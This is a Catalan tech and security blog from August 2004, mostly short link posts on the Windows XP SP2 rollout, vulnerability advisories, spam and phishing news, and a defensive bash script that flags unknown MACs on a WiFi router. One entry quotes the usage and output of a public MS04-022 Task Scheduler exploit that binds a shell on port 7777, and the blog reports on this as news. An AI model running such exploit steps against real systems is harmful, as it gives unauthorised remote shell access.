Autors: Andrew A. Vladimirov, Konstantin V. Gavrilenko i Andrei A. Mikhailovsky
1a edició (juny 2004)
608 pàgines
ISBN: 0-32120-217-1
El llibre a Amazon.com i a Amazon.co.uk.
|
14:24 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Instal·lat el SP2 de Windows XP, aparentment sense cap problema.
|
11:27 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Fa un any em preguntava: encara haurem d'esperar un any? (per disposar del Service Pack 2)... i sí, ha calgut esperar un any.
Continuant amb el SP2, la Mary Jo Foley intenta explicar quina és la millor opció per a la instal·lació del Service Pack 2: Winding Your Way Through the SP2 Distribution Maze d'entre els molts mètodes existents.
Especialment interessant per a moltes empreses és el toolkit publicat per Microsoft per impedir que els usuaris d'una xarxa corporativa es puguin instal·lar el Service Pack 2 a través de Windows Update i la instal·lació automàtica d'actualitzacions: Temporarily Disabling Delivery of Windows XP Service Pack 2 through Windows Update and Automatic Update. En algunes xarxes pot ser molt interessant que els usuaris no s'instal·lin el SP2 a través de Windows Update, per evitar problemes de compatibilitat... i per no saturar l'ample de banda.
Please note that the mechanism to temporarily disable delivery of Windows XP SP2 will be available for a period of 120 days (4 months) from August 16. At the end of this period, Windows XP SP2 will be delivered to all Windows XP and Windows XP Service Pack 1 systems.
|
11:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 13 / agost / 2004 |
 Foto feta amb el Treo
La vista des de la finestra de la seu corporativa d'AndBanc.
|
20:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Windows XP Service Pack 2 Experiences, una web mantinguda pel SANS Institute - Internet Storm Center on es recullen tota mena d'experiències després d'instal·lar el Service Pack 2 de Windows XP
Please only use this page to post factual experiences related to Windows XP Service Pack 2. Do not post opinions about the service pack in general. The intent is to help others that may run into similar problems, or to tell people what conflicts may or may not exist.
|
20:48 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Airpwn és una eina per a Linux que permet la inserció de paquets dins d'una xarxa 802.11.
|
20:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SecurityFocus] Anti-Spam Solutions and Security. El correu brossa ja no és només quelcom que emprenya; ja és un autèntic problema de seguretat. Article en dues parts.
The Simple Mail Transfer Protocol was never designed for security. SMTP dates all the way back to a 1973 extension to the FTP protocol.
|
20:27 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 10 / agost / 2004 |
Ja no recordava quin pal era connectar a Internet via mòdem...
|
07:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft ha publicat dos conjunts d'eines relacionades amb el Service Pack 2:
També hi ha disponibles les versions actualitzades dels discos d'inici (versions Home i Professional) necessaris per a la realització d'una nova instal·lació en equips que no permeten iniciar la màquina des del CD-ROM.
Finalment, el paquet SMS amb les definicions del SP2.
|
06:54 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[incidents.org] New Bagle Variant Spreading. Hi ha un nou cuc circulant per la xarxa. A incidents.org han publicat la primera anàlisi i les primers indicacions de com evitar-ne la distribució tot bloquejant un parell d'adreces.
|
06:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La versió completa del SP2, en anglès, ja està disponible. Són 272 MB i és la versió pensada per a la instal·lació en diversos ordinadors. Durant els propers dies estarà disponible la versió per a ser instal·lada en un únic sistema, a través de Windows Update, d'una mida considerablement inferior.
|
06:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 9 / agost / 2004 |
 Aquesta setmana i la vinent estic a Andorra, treballant en un projecte per un banc. Encara no se quina capacitat de connexió disposaré mentre estigui per allà, però molt em temo que estaré limitat a connexions telefòniques així que en el pitjor dels casos no podré fer cap actualització fins que no torni a baixar el proper divendres.
|
02:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Netcraft] Phishing Attacks Using Banner Ads to Spread Malware. Una altra modalitat d'atacs phishing i les possibilitats de distribució de malware a través dels banners de publicitat:
Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. In a troubling development, phishing scams have recently demonstrated the ability to install keylogging trojans via banner ads.
|
01:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Vnunet] You are still the weakest security link
The poll of 1,240 British businesses found employee misuse of technology topping the reasons for security breaches, with 50 per cent of businesses having problems. The second highest cause, at 45 per cent, was poorly updated antivirus software.
|
00:40 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 8 / agost / 2004 |
[IT Conversations] Paul Graham parla del seu llibre «Hackers and Painters». MP3 (9,5 MB) i transcripció
Unlike architects (who figure out what to build) and engineers (who figure out how), great hackers and painters do both.
Una bonica definició de qui és un hacker.
|
22:01 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Hi ha un problema a Windows XP SP2 (versió final) que, sense ser greu si cal tenir en compte: la visualització i/o edició de les polítiques de grup amb GPEdit provoca la modificació de l'hora dels fitxers .ADM emmagatzemats a SysVol, de forma que la simple visualització dels mateixos provoca l'enviament d'una nova versió dels fitxers.
Això pot provocar un conflicte si hi ha algun altre administrador treballant amb aquests fitxers, el que provocarà l'aparició del missatge d'error:
"The following entry in the [strings] section is too long and has been truncated"
Per a la solució del problema i més detalls sobre el problema consulteu l'article 842933 de la Knowledge Base de Microsoft. A hores d'ara Microsoft encara no ha publicat les actualitzacions per eliminar aquest problema en totes les versions de Windows.
|
21:49 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
En els últims mesos, tal com hem recollit en diversos butlletins del servei "una-al-dia", s'han popularitzat els atacs phishing. Sabem reconèixer un d'aquests atacs?
Continuació... - També a Hispasec.com
|
20:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Foto realitzada per la meva germana, que ahir va visitar el Fòrum 2004.
|
19:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[O'Reilly Network] Virtual Machines for Disaster Recovery Planning.
Virtual machines (VMs), due to their encapsulation and standardization of virtual hardware components, enable quick recovery on a diverse set of hardware platforms. This means quicker time to recovery and a significant drop in cost for implementation of a disaster recovery (DR) plan.
|
14:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[InfoSec Writers] Port-based authentication with IEEE 802.1x
IEEE Standard 802.1x-2001 was approved by both the Institute of Electrical and Electronics Engineers (IEEE) and the American National Standards Institute (ANSI) in 2001. It provides port-based network access control for local and metropolitan area networks:
This standard defines a mechanism for Port-based network access control that makes use of the physical access characteristics of IEEE 802 LAN infrastructures in order to provide a means of authenticating and authorizing devices attached to a LAN port that has point-to-point connection characteristics, and of preventing access to that port in case in which the authentication and authorization process fails.
|
11:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 7 / agost / 2004 |
Microsoft ha anunciat que el Service Pack 2 per a Windows XP, una actualització llargament esperada, estarà finalment disponible durant els propers dies.
Continuació... - També a Hispasec.com
|
23:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Slashdot] Follow the Bouncing Malware analitza el funcionament dels programes espies: com s'instal·len i s'amaguen:
On July 20th, after investigating some adware/spyware/malware that had been loaded onto a machine without the user's knowledge, I decided to try an experiment. I wondered just exactly how easy it really was to get an unpatched machine compromised, and what it would look like to "Joe Average" computer user. I set up a VMWare image of a fresh install of Windows XP Home Edition, and headed out on the internet to see just exactly what happened. My trip was an enlightening journey into the dangers lurking out on the 'net for the unwary, and along the way I've learned some interesting things about the spyware/adware industry
|
23:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Un dels aspectes que considero més negatius del Treo és en alguns detalls que falten. Així no té massa sentit que el fabricant hagi decidit no incloure una base de sincronització alhora de vendre l'equip i, en canvi, oferir-lo com una opció separada. Tampoc no considero encertat incloure dos cables separats, un per sincronització i l'altra per a carregar la bateria quan al mercat --i la mateixa PalmOne-- ofereixen aquesta mateixa funcionalitat amb un sol cable.
Però fins avui la principal mancança que trobava al Treo era la impossibilitat d'utilitzar-lo com a mòdem del PC. Tampoc no m'havia calgut mai i amb els preus dels accessos GPRS, tampoc no es que la situació fos com per cercar aquesta funcionalitat.
Com les dues properes setmanes estic a Andorra, on no se pas quina capacitat de connexió tindré, he volgut explorar la possibilitat d'utilitzar el Treo com a mòdem del portàtil.
He trobat que és possible... a través d'un programa/controlador publicat per un tercer fabricant (i que cal adquirir). S'anomena PdaNet.
La instal·lació es prou simple. Un assistent InstallShield instal·la un senzill programa de control i el controlador de mòdem, així com una aplicació que s'instal·la al telèfon mòbil.
Aquesta aplicació al mòbil senzillament ofereix un botó per a connectar i desconnectar:
En el moment que es prem el botó de connexió, el PC estableix la connexió a Internet a 57,6 Kbps:
I ja està. Així de senzill. Fins que no tornem a prémer el botó, el Treo estarà actuant com a mòdem del PC, visualitzant un comptador del tràfic d'entrada i sortida (per així poder veure com la nostra butxaca es va buidant).
Una prestació interessant per situacions d'emergència que, com he dit abans, hauria de realitzar el telèfon de forma estàndard.
|
20:48 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Hi ha millor plat per a l'estiu que una esqueixada?
|
17:27 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Per ara únicament està disponible pels subscriptors de MSDN, en format d'imatge ISO de 475,35 MB.
La resta d'usuaris haurem d'esperar a dilluns, encara haurem d'esperar uns dies. La planificació de Microsoft és la següent:
8/6 Release to manufacturing
8/9 Release to Microsoft Download Center (network installation package)
8/9 Release to MSDN subscription site (CD ISO image)
8/10 Release to Automatic Updates (for machines running pre-release versions of Windows XP Service Pack 2 only)
8/16 Release to Automatic Updates (for machines NOT running pre-releases versions of Windows XP Service Pack 2)
8/16 Release to Software Update Services Later in August Release to Windows Update for interactive user installations
És a dir, els que actualment fem servir les versions prèvies del SP2 el podrem començar a baixar a partir del dia 10, mentre que la resta d'usuaris el podran començar a baixar a partir del 16 d'agost.
Addicionalment, Microsoft ha obert una pàgina amb la informació actualitzada sobre el Service Pack 2 pels professionals informàtics.
|
15:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] After delays, Windows security update ready to go
The company said it has released Windows XP Service Pack 2 to manufacturing, following a series of delays. Microsoft will make the free update available via download and via CD, but it is recommending that customers turn on Windows' automatic upgrade feature and get the update that way.
|
09:13 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
SANS Institute ofereix formació específica sobre seguretat a la plataforma LAMP (Linux+Apache+MySQL+PHP): Track 15: Secure Internet Presence - LAMP.
The SANS LAMP track is the first SANS advanced Operations Course and will teach you the skills and techniques needed to build and operate a secure web presence. Our target audience is administrators and developers responsible for LAMP components or online applications. In addition to covering the security of a LAMP application, we also explore operational issues such as performance tuning, managing log files, database administration, backups, and replication.
This track was developed as an advanced course, and students should have experience with Linux and web concepts to truly master all of the material. The overwhelming feedback from students in SANS classes is that more hands-on time is desired. When building this course, we listened! Each day will be very hands-on. As we teach each topic, we want you to do it yourself in class to ensure that the concepts are mastered.
Aquest curs es farà per primera vegada al SANS Network Security 2004, del 29 de setembre al 4 d'octubre a Las Vegas.
|
07:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 6 / agost / 2004 |
[Microsoft] Using Netsh. Avui he descobert una joia inclosa a Windows XP, 2003 i 2000: Netsh, una eina per visualitzar i/o modificar, de forma local o remota, la configuració de xarxa.
Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh also provides a scripting feature that allows you to run a group of commands in batch mode against a specified computer. Netsh can also save a configuration script in a text file for archival purposes or to help you configure other servers.
Per exemple, ens permet fer: netsh interface dump
per obtenir totes les dades de la configuració de xarxa de Windows... que en cas de necessitat podrà ser fàcilment restaurada.
|
21:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Resulta que ara el pallasso aquell que durant un bon temps va ser president de govern, aquell que veia terroristes per tot arreu i parlava de la confabulación judeo - masoníca - nacionalista, indepedentista y separatista, amb frases tan mítiques com «Ya está bien que algunos se levanten todas las mañanas con el propósito de insultar a españa», doncs ara que s'ha prejubilat, per fer algun caleró extra s'ofereix com a conferenciant...
El curiós d'això és la seva descripció de mèrits
Quines són les qualitats d'un gran líder? Com conduir una nació a un lloc on la gent no hi vol anar? José María Aznar coneix això. El primer ministre d'espanya del 1996 al 2004, Aznar, va treure al seu país de anys de declivi gràcies a reformes que d'entrada no van ser populars, que van portar a un renaixement econòmic i cultural. A més, ell es va mantenir ferm en la seva política contra el terrorisme i de suport als Estats Units, fins i tot quan les enquestes no li eren favorables. Ara Aznar comparteix les seves idees sobre el lideratge en el terreny mundial, sobre la responsabilitat i atributs d'un líder.
És a dir, si al final haurem d'entronitzar a l'Aznar per ajudar-nos a sortir del declivi econòmic i cultural...
|
19:18 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
The Art of Web Filtering
It’s hard to believe, but just 5 years ago the Internet was typically used by a small number of people who were curious about computers, or those in jobs that required the level of communication provided by the Internet. Since then it has grown exponentially and now most people have a connection to the Internet. A majority of the people who use the Internet do little else but view web pages. One service provided by the Internet is the ability to access web pages. One can find information on any topic known to man, anything from how to make a paper airplane to pornography. Due to the growth of traffic, the lack of central management on the Internet, and to prevent people from seeing offensive or inappropriate material on the internet, software has been developed to block communication with certain sites. This classification of software has been declared "Web Filters".
|
19:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[El Periódico] El guardià dels jocs. Entrevista al responsable de seguretat informàtica dels Jocs Olímpics d'Atenes.
No considerem la possibilitat d'un fracàs. Tot està sota control.
A veure si en acabar els Jocs diu el mateix.
|
18:48 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Windows Devcenter] Windows Server Hacks: Creating a Password Reset Disk.
Depending on the machine and user involved, losing a password for an account can be anything from a pain to a disaster. Fortunately, in Windows Server 2003 and Windows XP there's something you can do to prepare for such an eventuality: create a password reset disk.
|
07:06 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Register] Pfizer takes big stick to Viagra spammers
Pfizer, the maker of Viagra, has declared war on spammers and online pharmacies, illegally peddling pills under the Viagra brand. The company says it will pursue the offending persons and organisations in court. It is taking the action after its market research revealed that a quarter of men think Pfizer is the source of spam emails advertising the drug.
Tindran feina... :-)
|
06:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Hispasec] Múltiples vulnerabilidades en libpng 1.x. S'ha descobert l'existència de diverses vulnerabilitats a la biblioteca libpng que poden ser utilitzades per realitzar atacs de denegació de servei o fins i tot comprometre els sistemes afectats. Com es tracta d'una biblioteca utilitzada a nombrosos programes, l'impacte es prou important ja que tots els programes que facin servir una versió vulnerable de libpng potencialment es poden veure afectats per aquests problemes.
El CERT també ha emès un avís sobre això: Multiple vulnerabilities in libpng.
|
06:50 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] First malicious program aims for handhelds. El primer virus malèvol que ataca a dispositius mòbils, concretament els que fan servir el sistema operatiu Windows Pocket PC.
The program, known alternately as Backdoor.Bardor.A and WinCE.Brador.a, lets an attacker gain full control of the handheld and is the first such "backdoor Trojan" program to emerge for Pocket PCs. However, such backdoor programs are not capable of propagating on their own and instead must be sent as e-mail attachments or through similar means, making them less dangerous.
Symantec rated the bug a "1," the lowest on its five-point scale.
|
06:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[News.com] Sun's Solaris 10 to run Linux apps, too. Pel que sembla, Solaris 10 (plataforma x86) permetrà l'execució directa de programes Linux:
Sun Microsystems will build software into its forthcoming Solaris 10 version of Unix to run Linux applications unchanged.
The software, called Project Janus, will work on servers using x86 chips such as Intel's Xeon and Advanced Micro Devices' Opteron.
|
06:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Actualització a agost de 2004 d'un llibre gratuït de Microsoft sobre seguretat del correu electrònic. Tracta de la utilització de S/MIME per al xifrat del correu i la utilització de certificats digitals per verificar la identitat del remitent d'un missatge.
|
06:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 5 / agost / 2004 |
Les properes dues setmanes estic treballant en un projecte a Escaldes-Engordany, al Principat d'Andorra. Em fa il·lusió ja que fa molts anys (gairebé deu!) que no vaig a Andorra, país del que conservo uns records immillorables.
Com està el tema dels accessos a Internet al País dels Pirineus? Hi ha alguna mena d'accés pel qual no calgui un registre previ?
I un accés sense fils? És fàcil trobar punts d'accés? Hi ha alguna web on trobi un mapa de les zones amb accés WiFi?
Gràcies per endavant!
|
20:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Windows Noises... genial!!! (no oblideu de pujar una mica el volum de l'altaveu). Un concert amb els fitxers de sons que inclou Windows.
|
17:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Publicat l'SpamAssassin 2.64. Es tracta d'una actualització que elimina una vulnerabilitat a les versions 2.5 i 2.6x (fins 2.63) que pot ser utilitzada, a través d'un missatge especialment formatejat, per efectuar un atac de Denegació de Servei. A més s'incorporen nous fitxers de signatures agafats del desenvolupament de SpamAssassin 3.0.
|
15:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 4 / agost / 2004 |
# Verificar el paràmetre de la línia d'ordres
if [ "$1" = "-v" ] ;
then
VERBOSE=$1
fi
#
# (...)
#
# Visualitzar missatge
[ $VERBOSE ] && echo "Missatge
|
19:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Russell Beattie] My 7610 Review, un passeig detallat per les característiques d'un dels nous models de telèfon mòbil de Nokia, el 7610.
|
06:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Insert Security Resource Toolkit és una distribució de Linux que funciona directament des del CD-ROM, que inclou diverses eines d'interès per a la detecció de virus informàtics i la recuperació de màquines Windows davant de desastres:
- Complet suport de lectura/escriptura de particions NTFS
- Suport dels principals sistemes de fitxers (EXT2, EXT3, MINIX, REISERFS, JFS, XFS, NTFS, FAT, MSDOS, NFS, SMBFS, NCPFS, UDF, UFS, HFS, HFS+...)
- Suport de RAID i LVM de Linux per software
- Eines per a l'anàlisi de xarxes (nmap, tcpdump)
- Eines de recuperació davant desastres (gpart, partimage, testdisk)
- Antivirus, amb baixada d'actualitzacions de signatures (ClamAV)
- Eines per a l'anàlisi forense
- Eines bàsiques per a l'accés a Internet
|
06:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 3 / agost / 2004 |
 PuTTY és l'emulador de terminal i client SSH (v1 i v2) de referència per a sistemes Windows ja que destaca per la portabilitat: amb un només portat un petit fitxer EXE ja tenim tot el necessari per accedir a servidors remot, sense que calgui fer ca procés d'instal·lació.
Acaba de publicar-se la versió 0.55, que soluciona una vulnerabilitat de seguretat a totes les versions anteriors. Aquesta vulnerabilitat pot ser utilitzada per un servidor SSH2 per atacar al client just abans de realitzar la verificació dels certificats. Evidentment la vulnerabilitat es difícil d'explotar, però no per això deixa de ser un problema important, de forma que convé que tots els usuaris de PuTTY actualitzin a la nova versió el més aviat possible.
|
21:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Visiteu aquesta pàgina amb Mozilla/Firefox. Un cop carregada, fixeu-vos que en la part inferior esquerra surt la icona com si es tractés d'una pàgina segura. Feu doble click al pany per entrar a les propietats i visualitzeu els detalls del «certificat»...
|
20:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Oi que fa calor? Oi que seria una bona idea poder portar un ventilador portàtil per refrescar-nos, a l'estil d'aquell que abans portaven alguns cotxes?
Doncs algú hi ha pensat:
Quina serà l'evolució? Un equip d'aire condicionat de butxaca?
|
18:39 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Netcraft] Beyond MP3
Both MP3 and MP3Pro are proprietary standards. This has led to the creation of a completely free alternative, called Ogg Vorbis.
|
18:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Ja fa uns mesos vaig comentar l'existència de la utilitat PortQry de Microsoft, pensada per ajudar a identificar els possibles problemes amb les comunicacions TCP/IP. PortQry visualitza l'estat dels ports TCP/UDP seleccionats.
Avui Microsoft ha publicat una utilitat associada, PortQryUI que és una interfície gràfica (PortQry només funciona des de la línia d'ordres).
|
14:08 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Barrapunto] Cierra En.Red.Ando. L'empresa del Luis Ángel Fernández Hermana ha fet llufa... llàstima que amb la desaparició de l'empresa, els continguts de la revista també s'han volatilitzat (en podeu veure algun encara via archive.org).
|
10:10 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[bmonday] FirstOnScene.vbs: The 10-second Forensic Data Gatherer. Script en Visual BASIC que recull la informació bàsica per a una anàlisi forense d'un equip Windows
So I came up with a compromise called FirstOnScene.vbs. It's a script that runs in under 10 seconds and gathers forensic information from the target system using about 20 different freely-available tools.
|
07:20 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] Windows Accelerators - Do They Really Work?
Among the plethora of traditional registry tweakers, the review mentioned Hare 1.5.1. The developers promised nothing less than up to 300% speed increase, 10% FPS increase in 3D games, automatic RAM preservation and even a wizard that automatically cleans and optimizes Windows.
(...)
After a little research I found that download.com didn't have it and there are precious few reviews of this revolutionary software online, but that it was endorsed by McAfee and that developers touted conformance with Microsoft's interface guidelines as an important feature.
(...)
Truth be told, after several minutes I was blown away. Obviously I can't tell how well every promised features works, but disk caching (and pre-fetching) that Hare does is outstanding and display performance improved enough to scare me - windows were opening, minimizing and redrawing without the delay I was accustomed to.
|
06:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Hispasec] Vulnerabilidad en Mozilla y Firefox favorece el phishing
Se ha anunciado una vulnerabilidad en Mozilla y Firefox que permitiría a sitios web maliciosos falsificar el interfaz de usuario, lo que puede inducir al usuario a creer que se encuentra en un sitio diferente y ser empleado para realizar ataques de phishing
(...)
Hay que señalar que no se trata de un problema nuevo, ya que el mencionado bug fue mencionado por primera vez en 1999, pero fue marcado como confidencial durante 5 años, hasta que el pasado día 21 un desarrollador independiente publicó el aviso.
Se tiene constancia de la existencia de código de prueba de concepto que hace creer al usuario que se está utilizando un certificado válido de PayPal.
Este problema ha sido confirmado en Mozilla 1.7 para Linux y 1.7.1 para Windows, Firefox 0.9.1 para Linux y 0.9.2 para Windows. Aunque teniendo en cuenta la fecha del aviso original, en versiones anteriores también se encuentra presente.
|
06:23 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
arstechnica.com compara VMware i Virtual PC.
Les conclusions: Virtual PC és més fàcil d'utilitzar i ofereix un millor suport de Windows. VMware és més potent, ofereix un millor rendiment i destaca pel suport de Linux i les possibilitats de configurar tots els aspectes de comunicacions.
|
00:21 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 2 / agost / 2004 |
Avui he hagut de fer un petit script (de forma ràpida) per verificar si en un punt d'accés WiFi, on es pot limitar el control d'accés per adreça MAC, hi ha alguna connexió no autoritzada (entenent com a tal una adreça MAC no reconeguda).
La idea es baixar-se la pàgina d'estat amb wget i comparar la relació d'adreces MAC amb una relació inclosa al mateix script. El resultat és aquest:
# Script que es connecta al router WiFi i mira
# qui hi ha connectat
# Variable amb les MAC permeses, separades amb un espai
# en blanc
PERMESES="xx-xx-xx-xx-xx-xx xx-xx-xx-xx-xx-xx"
# Baixar el fitxer d'status
wget --output-document /tmp/lan.htm \
--http-user=XXXX --http-passwd=XXXXX \
http://XX.XX.XX.XX:8080/lan.htm > /dev/null 2>&1
# Extreure la MAC i emmagatzermar-la dins d'un array
MAC=( `grep ..-..-..-..-..-.. /tmp/lan.htm | \
awk ' { print $11 } ' | cut -d">" --fields=2 | \
cut -d"<" --fields=1` )
# Determinar el nombre de MAC obtingudes (menys 1)
NOMBRE=`expr ${#MAC[@]} - 1`
# Per a cada element, verificar si la MAC és bona
for number in `seq 0 $NOMBRE`
do
echo $PERMESES | grep ${MAC[$number]} > /dev/null 2>&1
if [ "$?" != "0" ]; then
# MAC no trobada
echo "MAC no autoritzada"
fi
done
Algun suggeriment per millorar-lo?
|
21:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Un port de Linux per a l'iPod
This site provides details of my venture into porting Linux to the iPod.
Unfortunately the iPod is considered a "closed-platform" by Apple and technical info is virtually non-existant so this has involved a fair bit of guess work, reverse-engineering and experimentation! But the end result is a Linux kernel (based on the uClinux port) running on the 'Pod.
I hope that this initial port provides some inspiration to others out there to see what more they can get the iPod to do!
|
18:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Wired] Mexican Officials Get Chipped. El Fiscal General de Mèxic va confirmar que porta (ell i d'altres funcionaris) un xip implantat per tal de poder accedir a una nova base de dades sobre delictes i per tal de poder ser localitzar en cas de que sigui segrestat...
|
18:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
SpamUsement, una sèrie de tires còmiques inspirades en les frases utilitzades com tema pel correu brossa.
|
07:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft ha publicat una eina per esborrar els cucs MyDoom (Mydoom.A, Mydoom.B, Mydoom.E, Mydoom.F, Mydoom.G, Mydoom.J, Mydoom.L i Mydoom.O), Zindos (Zindos.A) i Doomjuice (Doomjuice.A i Doomjuice.B) d'aquells sistemes ja infectats. Aquesta eina funciona en Windiows 2000, Windows 98, Windows ME, Windows Server 2003 i Windows XP.
|
07:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
HOWTO/Guia sobre el filtrat d'SPAM als servidors de correu, explicant les diverses tècniques de filtrat del correu brossa a nivell de servidor de correu. Tracta de les consideracions que cal tenir en compte, discussió teòrica dels diversos mètodes (pauses en la transacció, llistes grises, esquemes d'autorització de l'emissor, signatura de l'emissor...). Aquesta guia és un esborrany avançat d'un document que formarà part del Linux Documentation Project. Ara per ara, la implementació dels mecanismes descrits es mostra únicament amb un MTA, Exim i l'autor demana l'ajuda per implementar-los en d'altres servidors com poden ser el Sendmail i PostFix.
|
07:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Bash 3.0... un d'aquells productes que fem servir cada dia però que sovint oblidem que hi és.
|
06:41 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Redbook d'IBM: IBM TotalStorage: Introducing the SAN File System. Explica el funcionament del sistema de fitxers SAN
SAN File System is a robust, scalable, secure network-based filesystem designed to provide near-local file system performance, file aggregation, and data sharing services in an open environment. SAN File System helps lower the cost of storage management and enhance productivity by providing centralized management, higher storage utilization, and shared access by clients to large amounts of storage.
|
06:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Yahoo News] Steve Jobs operat d'un càncer al pàncrees
"This weekend I underwent a successful surgery to remove a cancerous tumor from my pancreas," Jobs wrote in the e-mail. "I had a very rare form of pancreatic cancer called an islet cell neuroendocrine tumor, which represents about 1 percent of the total cases of pancreatic cancer diagnosed each year, and can be cured by surgical removal if diagnosed in time (mine was)."
|
02:07 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La adicción a Internet no existe, article de divulgació de Helena Matute sobre el suposat mite de l'adicció que crea Internet. A l'article es desmunta aquesta adicció i s'explica l'origen del mite.
El término "adicción a Internet" fue originalmente una broma de correo electrónico.
|
01:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[eBCVG.com] Data Integrity - The Unknown Threat, un interessant article sobre un dels punts de la seguretat al que sovint no se li dóna importància: la integritat de les dades. La detecció de modificació de dades sovint és el primer senyal que alguna cosa «rara» està succeint.
|
01:30 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 1 / agost / 2004 |
Aquesta tarda m'he entretingut en visitar els serveis d'informació a través del telèfon mòbil que ofereixen diversos mitjans de comunicació catalans. El resultat, desencisador. Només TV3 ofereix contingut real; al Diari de Barcelona fa gairebé un any que no actualitzen el contingut i Vilaweb només ofereix titulars enllaçats a pàgines web externes.
|
19:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Economist.com] Unix's founding fathers, explica com va nèixer el sistema operatiu Unix tal i com el va viure Dennis Ritchie, l'inventor del llenguatge C i un dels «pares» d'Unix.
|
12:37 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Jon Udell] Tragedy of the network commons, sobre la importància de la consciència dels usuaris en l'efectivitat de les mesures de seguretat i els efectes que això pot tenir sobre la viabilitat de les tecnologies
A recent survey found that 75 percent of Dartmouth students have shared their network passwords. "They like having people who know their password," explained Denise Anthony, a sociologist who spoke at the PKI summit conference I attended earlier this month.
|
00:49 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[K-Otix] Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)Example:
C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
(MS04-022) Microsoft Windows XP Task Scheduler
(.job) Universal Exploit
--- Coded by .::[ houseofdabus ]::. ---
[*] Shellcode: Portbind, port = 7777
[*] Generate file: expl.job
C:\>
start IE -> C:\
C:\>telnet localhost 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\v.X\>
|
00:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Infosec Writers] A Study Of Steganography And The Art Of Hiding Information
The recently created technology of steganography entices a wide audience from the casual observer, to the scientific professional. The various applications of steganography must be scrutinized in order to understand the future progression of this technology. This paper attempts to reveal new and current angles of steganography. What are revealed in this essay are the ingenious history and background of steganography in examples and its interwoven development path with cryptography, even to this day. On a technical level this paper tests the steganography community’s theory that, in general, the stego process diminishes contrast within a digital photo. Steganography is obscure in its recurrent appearance and disappearance throughout history. On a sociological level, having finally taken a foothold during the internet generation’s explosive growth of the 1990s, steganography serves as a means for private, secure and sometimes malicious communication.
|
00:17 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
Publicat l'
Publicades les versions en català de 
[Via 
No l'actualitzen des de mitjans de novembre de l'any 2003... 
